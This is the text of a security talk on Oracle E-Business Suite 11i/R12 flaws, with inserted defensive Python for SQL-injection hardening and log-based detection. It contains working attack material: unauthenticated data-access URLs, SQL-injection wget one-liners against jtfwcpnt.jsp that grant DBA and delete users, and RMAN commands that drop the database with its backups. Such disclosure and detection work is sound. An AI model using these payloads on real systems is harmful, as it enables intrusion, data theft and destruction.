Vulnerabilities in Oracle Financials - Joxean Koret
Hackproofing Oracle Financials
Vulnerabilities in Oracle E-Business Suite R12
What is Oracle Financials?
It is an Enterprise Resource Planning (ERP) product
The names Oracle E-Business Suite, Oracle Applications, Oracle Financials, etc. all refer to the same product
ERP Statistics
As of 2005, SAP and Oracle Applications were the most widely deployed
Market Share
Who is using Oracle Financials?
Very large list of customers
http://www.oracle.com/customers/products/financials2.html
In short...
Militaries & governments, e.g. the North Atlantic Treaty Organization (NATO)
Banks
Airways & airlines
Petrochemical companies
Hospitals
...
Some well known customers
Marvel, Banque de France, U.S. Airways, U.S. Navy, U.S. Army, Mitsubishi, Airtel, NH Hotels, Canon, EMC Corporation, Flemish Government, Fujitsu, Toshiba, Google Inc, Unisys, U.S. Postal Service, Toyota, General Electric, Dubai's Government, Oracle itself, etc.
Enough (and interesting) customers to care about ;)
About the talk
What are we going to cover in this talk?
Architecture overview (basic concepts + brief introduction)
Components (11i & R12)
Design flaws
Vulnerabilities
How to own
Architecture Overview
Architecture: Attacker's point of view
Application Server components
Web Server, Forms Server (& Reports Server)
But Reports is not always reachable from the Internet
JSP, Servlets, CGIs and "the" PL/SQL Gateway
The PL/SQL Gateway was removed in R12 due to many security problems
Database Server components
Data
PL/SQL software
Basic Concepts
Forms Server
A Java applet that communicates (via HTTP in the latest versions) with the application server
Used to display GUIs
Reports Server
The same, but only for reports
PL/SQL Gateway
A way to execute PL/SQL code directly from a browser, like a CGI but inside the database
Information Gathering
Information Gathering
Oracle Financials 11i
http://middletier/pls/DAD/fnd_web.ping
Oracle Financials R12
The PL/SQL Gateway was removed, so the URL changed to:
http://middletier/OA_HTML/jsp/fnd/fndping.jsp
What information do we get this way?
Information Gathered
Information Gathering
Install Path Disclosure
Install Path Disclosure
The script /OA_HTML/biserror.jsp receives a parameter called "DBC" (DataBase Configuration)
A DBC file is a file in the middle tier with information about the database address, etc.
The script reveals the installation path when a non-existent DBC file is given to it
Installation Path Disclosure
Information Gathering
Information retrieval is (sometimes) vital for successful intrusions
The database's SID and schema (commonly APPS)
It is also typical to host multiple Oracle Financials instances on the same machine:
/d01/apps/r12
/d02/apps/r11
You must know the operating system to completely own the system
Vulnerabilities
Vulnerabilities by component
Middle-tier
Oracle Forms
PL/SQL gateway (only in version 11i)
JSP
Database backend
Oracle Database
Middle-tier (again)
The Printers From Hell
Vulnerabilities: Cross Site Scripting
Oracle Financials is full of XSS vulnerabilities
For example, the script biserror.jsp is designed to show an error page with a custom message
The message text can be HTML code
By design!
XSS in biserror.jsp
Vulnerabilities
Cross Site Scripting vulnerabilities are only useful (when you do not have real exploits) for:
Session hijacking
Phishing
Manipulating admin panels
Etc.
However, there are many very interesting vulnerabilities in Oracle Financials so, ignore XSS ;)
Mistakes
The very first vulnerability I found in Oracle Financials 11i was only applicable to AIX (unfortunately)
The SYSADMIN user has the responsibility (role) SYSADMIN
Looking for other users with the same responsibility...
The GUEST user appears! So any GUEST user is, in fact, SYSADMIN!!!
Cool!
Applicable to all Oracle Apps 11i versions for AIX
For the developers...
Oracle Forms
One of the more interesting vulnerabilities is in the Oracle Forms Listener.
Whenever a new user wants to connect to Oracle Forms via the web, a Login Form is shown
It is a Java applet
The Login Form
Oracle Forms Listener
But, how is the form loaded? What parameters are passed from the browser to the server, if any?
Remember, it's a Java applet that communicates with the application server
Oracle Forms Listener
Answer:
Oracle Forms Listener
So, again, we have another installation path disclosure but, wait...
What if you're able to upload a new form to the server, to a temporary path for example?
The form will be executed before logon
Possible temporary paths:
/incoming
/tmp
Oracle Forms Listener
The source code of almost every form in Oracle Financials is available:
Source code for the login form is in $FND_TOP/US/FNDSCSGN.fmb
Oracle Forms Source
$ cd $FND_TOP
$ pwd
/u03/oracle/prodappl/fnd/11.5.0/
$ cd forms
$ ls
E US
$ ls US/
APPTREE.fmx FNDATENT.fmx FNDCPDIA.fmx FNDCUSTM.fmx FNDFFMIS.fmx
FNDFMFUN.fmx FNDPOMPV.fmx FNDSCAUS.fmx FNDSNDSQ.fmx FNDADDSQ.fmx
FNDATFUN.fmx FNDCPDPD.fmx FNDFBMAS.fmx FNDFFMSA.fmx FNDLVMLU.fmx
FNDPOMSV.fmx FNDSCDDG.fmx TEMPLATE.fmx (...)
Old Vulnerabilities: PL/SQL Gateway
In the previous version (Oracle Financials 11i) almost all the vulnerabilities I found were SQL injections or "mistakes"
Thanks to the PL/SQL Gateway
I'm going to tell you about several of them
Sorry, no demo for this version :(
The PL/SQL Gateway
Remember, the PL/SQL Gateway is a way to directly execute PL/SQL code in the database via a browser
"Where you see a feature I see a flaw!"
What if the PL/SQL code contains vulnerabilities?
You're running code directly in the database
You can run any procedure granted to PUBLIC
A lot of them, thousands in total
Cool!
Some reported & fixed vulnerabilities
http://<target>/pls/<DAD>/ADI_display_report.DisplayFile?P_DOCID=<doc id>
http://<target>/pls/<DAD>/ADI_BINARY_FILE.Show?p_DocumentId=<doc id>
Download any document stored in the ERP (contracts, etc.) without being authenticated
Just brute force the doc id and that's all
PL/SQL Gateway
But, wait! I don't know the DAD?
OK, simply navigate with your browser to the following location:
http://<target>:<port>/pls/
You will be redirected to the URL /pls/<DAD>/fnd_web.ping
In Oracle Apps since 11.5.10.2 you will get the message "Unauthorized"
But, well, when accessing the URL you were redirected to...
More vulnerabilities in Apps 11i
How can I see the complete list of customers and contacts of my adversary corporation?
Easy! The following URL is your answer:
/pls/<DAD>/ICXSUPWF.DISPLAYCONTACTS
No check for a valid session, valid privileges, etc.
The complete list of customers and contacts is printed in the web page
Cool++!
SQL Injection
Another vulnerable package (the name says that it's surely vulnerable)
/pls/<DAD>/ICX_UTIL.LOVVALUES
A LOV, in Oracle language, is a List Of Values
Typically, an SQL query to show some data
The script receives 2 cool parameters:
c_where_clause & c_js_where_clause
Guess what the purpose of these parameters is?
Cool^2
Returning to ICXSUPWF.DISPLAYCONTACTS
Do you remember the package to download the complete customer list?
Well, this package also receives a seemingly equal parameter:
p_where
Of course, this is an SQL where clause
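The design flaw behind c_where_clause, c_js_where_clause and p_where, as an added example that is not from the talk and not Oracle's code: a list-of-values lookup written the way those packages take their parameter (the caller supplies the predicate text), next to a hardened form that only accepts a column from an allow-list and binds the value. It runs on SQLite standing in for the Oracle backend; the customers table, its columns and the sample rows are constructed (only fnd_user is named in the talk).

```python
"""Added example (not from the talk or from Oracle): a list-of-values
(LOV) lookup that takes its WHERE clause from the caller, beside a
hardened form. SQLite stands in for the Oracle backend."""
import sqlite3


def make_db():
    """Constructed sample schema and rows. "customers" is an assumption;
    "fnd_user" is the Oracle Applications user table named in the talk."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE customers (party_name TEXT, party_type TEXT);
        CREATE TABLE fnd_user (user_name TEXT, encrypted_user_password TEXT);
        INSERT INTO customers VALUES ('ACME Corp', 'ORGANIZATION'), ('Jane Doe', 'PERSON');
        INSERT INTO fnd_user VALUES ('SYSADMIN', 'hashed-sysadmin'), ('GUEST', 'hashed-guest');
    """)
    return db


def lov_values_vulnerable(db, c_where_clause):
    """The flaw as designed: the caller's text *is* the predicate, so any
    SELECT the schema owner can run is reachable from a URL parameter."""
    sql = "SELECT party_name, party_type FROM customers WHERE " + c_where_clause
    return db.execute(sql).fetchall()


# Only these columns may be filtered on; any other name is rejected.
ALLOWED_FILTER_COLUMNS = {"party_name", "party_type"}


def lov_values_hardened(db, column, value):
    """Allow-listed column name plus a bound value: the caller never
    contributes SQL text, only data."""
    if column not in ALLOWED_FILTER_COLUMNS:
        raise ValueError(f"filter column not allowed: {column!r}")
    sql = f"SELECT party_name, party_type FROM customers WHERE {column} = ?"
    return db.execute(sql, (value,)).fetchall()


# What an attacker would send as c_where_clause (constructed payload).
UNION_PAYLOAD = "1=0 UNION SELECT user_name, encrypted_user_password FROM fnd_user"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lov_values_vulnerable(db, UNION_PAYLOAD))
    print("hardened, payload as value:", lov_values_hardened(db, "party_type", UNION_PAYLOAD))
    try:
        lov_values_hardened(db, UNION_PAYLOAD, "x")
    except ValueError as err:
        print("hardened, payload as column:", err)
```

The vulnerable function returns the contents of fnd_user through the customer LOV; the hardened one treats the same payload as a plain string and returns nothing, and refuses it outright when it arrives in the column position. The point is that no amount of escaping fixes a parameter whose purpose is to be SQL; the interface has to change.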
Sufficient SQL Injections
OK, we have sufficient "SQL injections" (or design flaws?) for now but, what can I do with them?
Well, some facts:
You're running your SQL code as the APPS user
The APPS user is the owner of the ERP's data
So you're the new owner of the data :)
Also, the APPS user has been granted the DBA role
So you're also the new DBA
Oracle Database User APPS
Running SQL code as a DBA you can do whatever you want, for example:
Create a Java procedure to execute OS commands and connect back to you
Create a PL/SQL backdoor to make executing new commands "easier?"
Execute a funny OS + RMAN command:
$ rman target /
rman> sql 'shutdown abort'
rman> drop database including backups noprompt;
And kill her wife if possible
Oracle Financials R12
I think I have shown sufficient (old, fixed) Oracle Apps 11i vulnerabilities
Now, it's time for Oracle Applications R12
Oracle Applications R12: Changes
In this version Oracle removed the PL/SQL Gateway
No fun :(
But they ported almost all the packages to JSP
So the only change for us is that we don't need a DAD this time; we already know the complete URL to access every JSP
http://<target>:<port>/OA_HTML/<yourjsp.jsp>
Oracle Applications R12: Changes
In this version they check in almost all JSP scripts for a valid session, except for applications allowed to GUEST
However, we can still have fun ;)
Establishing a GUEST session
To establish a GUEST session you just need to navigate to any "allowed to GUEST" JSP and, automagically, a new session will be created for you
Guest Sessions
When you want to log on via the web page you're presented with a web page similar to, if not the same as, the following one:
Guest Sessions
When you log on correctly you're redirected to the following web page:
Guest Sessions
If you navigate (before logging on) directly to this web page an exception occurs, but a new GUEST session gets created.
Servlet's Source Code
Guest Sessions
With a valid GUEST session we can now access any JSP.
But some of them will check whether we have the correct privileges, or simply fail because we're not SYSADMIN, etc.
Anyway, our attack surface has increased significantly :)
Oracle Financials R12
OK so... Do you remember the flaws where you can inject any where clause in Oracle Apps 11i?
Well, Oracle always surprised me...
Oracle Applications R12
In this version they added a cool script called jtfwcpnt.jsp.
It is a component of Oracle Financials CRM
In Oracle's words:
"A Card Paint to display cards in Smart List Search"
Questions to Larry Ellison, plz!
The script is completely flawed.
jtfwcpnt.jsp
This cool script receives one interesting parameter:
query
Do I need to explain anything else?
Let's see a very complicated exploit...
jtfwcpnt.jsp 0days 3xpl01ts
# OA.jsp is requested first so that a GUEST session gets created; wget
# reuses the cookies it received for the second URL of the same run
$ export TARGET="http://<target>:<port>/OA_HTML"
$ wget -O - "$TARGET/OA.jsp" "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'grant%20dba%20to%20mom';%20end;"
$ wget -O - "$TARGET/OA.jsp" "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;"
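Seen from the defender's side, as an added example that is not part of the talk: a small detector that runs over web-server access-log lines and flags the URLs and parameters this talk names, both the 11i PL/SQL Gateway paths (the /pls/ redirect, fnd_web.ping, ADI_display_report.DisplayFile, ADI_BINARY_FILE.Show, ICXSUPWF.DISPLAYCONTACTS, ICX_UTIL.LOVVALUES with c_where_clause) and the R12 JSPs (fndping.jsp, biserror.jsp with DBC, jtfwcpnt.jsp with query). It also counts document requests per client to surface the doc-id brute force. The log lines are constructed samples in Apache common log format; the DAD name PROD, the client addresses, the union-select payload and the brute-force threshold are assumptions.

```python
"""Added example (not from the talk): flag access-log requests that hit
the Oracle Applications 11i / R12 attack surface described in the talk."""
import re
from collections import Counter
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (Apache common log format); the DAD
# name "PROD", the client addresses and the payloads are assumptions.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2008:10:01:02 +0100] "GET /pls/ HTTP/1.1" 302 0
10.0.0.5 - - [12/Mar/2008:10:01:03 +0100] "GET /pls/PROD/fnd_web.ping HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2008:10:01:10 +0100] "GET /OA_HTML/biserror.jsp?DBC=nosuchfile HTTP/1.1" 200 1400
10.0.0.5 - - [12/Mar/2008:10:02:00 +0100] "GET /pls/PROD/ADI_display_report.DisplayFile?P_DOCID=1001 HTTP/1.1" 200 8000
10.0.0.5 - - [12/Mar/2008:10:02:01 +0100] "GET /pls/PROD/ADI_display_report.DisplayFile?P_DOCID=1002 HTTP/1.1" 200 7600
10.0.0.5 - - [12/Mar/2008:10:02:02 +0100] "GET /pls/PROD/ADI_BINARY_FILE.Show?p_DocumentId=1003 HTTP/1.1" 404 300
10.0.0.5 - - [12/Mar/2008:10:03:00 +0100] "GET /pls/PROD/ICX_UTIL.LOVVALUES?c_where_clause=1%3D1%20union%20select%20user,null%20from%20dual HTTP/1.1" 200 9000
10.0.0.9 - - [12/Mar/2008:10:04:00 +0100] "GET /OA_HTML/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'grant%20dba%20to%20mom';%20end; HTTP/1.1" 200 200
10.0.0.7 - - [12/Mar/2008:10:05:00 +0100] "GET /OA_HTML/AppsLogin HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+')

# Reconnaissance endpoints: DAD discovery and the ping pages (11i and R12).
RECON_PATH = re.compile(r'(?:^/pls/?$|/fnd_web\.ping$|/fndping\.jsp$)', re.I)
# 11i endpoints that handed out data without a session.
DATA_PATH = re.compile(
    r'/(?:ADI_display_report\.DisplayFile|ADI_BINARY_FILE\.Show|ICXSUPWF\.DISPLAYCONTACTS)$', re.I)
# Parameters that are SQL text by design.
WHERE_CLAUSE_PARAMS = {"c_where_clause", "c_js_where_clause", "p_where"}
# SQL or PL/SQL that should never appear in a query string.
PLSQL_MARKERS = re.compile(
    r'\b(?:execute\s+immediate|grant\s+dba|delete\s+from|union\s+select|dbms_\w+)', re.I)


def parse_query(query):
    """Split on '&' only (so ';' inside a PL/SQL block stays in the value)
    and decode keys and values once; keys are lower-cased."""
    params = {}
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            params.setdefault(unquote_plus(key).lower(), []).append(unquote_plus(value))
    return params


def classify(line):
    """Return {'ip', 'path', 'status', 'tags'} for a log line, or None if it
    does not parse. An empty tag list means the request looked benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path, params = url.path, parse_query(url.query)
    tags = []
    if RECON_PATH.search(path) or (path.lower().endswith("/biserror.jsp") and "dbc" in params):
        tags.append("recon")
    if DATA_PATH.search(path):
        tags.append("unauth-data-access")
    if path.lower().endswith("/jtfwcpnt.jsp") and "query" in params:
        tags.append("sqli:jtfwcpnt.query")
    for name in sorted(WHERE_CLAUSE_PARAMS & set(params)):
        tags.append(f"sqli:{name}")
    if PLSQL_MARKERS.search(" ".join(v for values in params.values() for v in values)):
        tags.append("plsql-payload")
    return {"ip": m["ip"], "path": path, "status": int(m["status"]), "tags": tags}


def analyze(log_text, bruteforce_threshold=3):
    """Return (flagged events, {ip: count}) where the dict lists clients that
    requested the document endpoints at least bruteforce_threshold times,
    i.e. the doc-id brute force. The threshold is an assumption."""
    events = [e for e in map(classify, log_text.splitlines()) if e and e["tags"]]
    per_ip = Counter(e["ip"] for e in events if "unauth-data-access" in e["tags"])
    bruteforce = {ip: n for ip, n in per_ip.items() if n >= bruteforce_threshold}
    return events, bruteforce


if __name__ == "__main__":
    flagged, brute = analyze(SAMPLE_LOG)
    for e in flagged:
        print(e["ip"], e["status"], e["path"], ",".join(e["tags"]))
    print("doc-id brute force suspects:", brute)
```

The path rules match by endpoint name rather than by full URL so they work whatever the DAD is called, and the query parser decodes once and splits only on '&' because the jtfwcpnt.jsp payload carries ';' inside the value. Status codes are kept on each event: a 404 on DisplayFile is as telling as a 200 when a client walks through document ids.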
Creating a new SYSADMIN user
We're running code as the APPS user so, again, we're the new owner of the data
So we can, for example, create a new SYSADMIN-like user:
Responsibilities
Running this PL/SQL code via the jtfwcpnt.jsp
script we create a new user and assign 2
responsibilities:
20420 – System Administrator (SYSADMIN)
20872 – System Administration
Owning by tiers
Abusing this flaw we gained access to the database backend
If we just want to extract some data, we're done: delete the created user and that's all
However, if we want to continue owning the rest of the tiers we need to find a way to execute code also in the middle tier
Remember, we gained access to the database and it will be in a different box :(
Gaining Access to the Middle-tiers
How can we gain access to the middle tiers?
Checked for a flawed JSP that writes something to disk, but nothing was found
Checked also for Runtime.getRuntime() and so on: no luck :(
But found a funny technique:
The Printer From Hell
The Printers From Hell
The Printer From Hell
Oracle Applications Server is a web based application
It's designed to be used by big companies, either connected from the LAN or from the Internet
They designed a way to print, from anywhere, to a printer specified by the system administrator
But, how are the printers configured?
The administrator does this via the ERP or by directly inserting into the database
The Printer From Hell
The Printer From Hell
We have a "printer coming from hell": just print something using the ERP or the PL/SQL packages and you're done
Th3 c0mpl3t3 $y$t3m w4$ 0wN3|)
However...
We're running code as the "oracle" OS-level user but I know no way to escalate to root :(
Well, if the database server is not correctly patched we can always use the "extjob" suid tool
Vulnerability CVE-2008-2613
But, what if the system is a Win32 box?
Don't worry! You're already running code as Local System :)
Conclusions
Oracle Financials R12
It's getting better in some aspects but there are plenty of quite stupid vulnerabilities
It's OK (in my opinion) to run it in our companies as an intranet application, but you should take care when opening connectivity to Oracle Financials from the Internet
IMHO...
Final Conclusion?
The End
Thank you folks!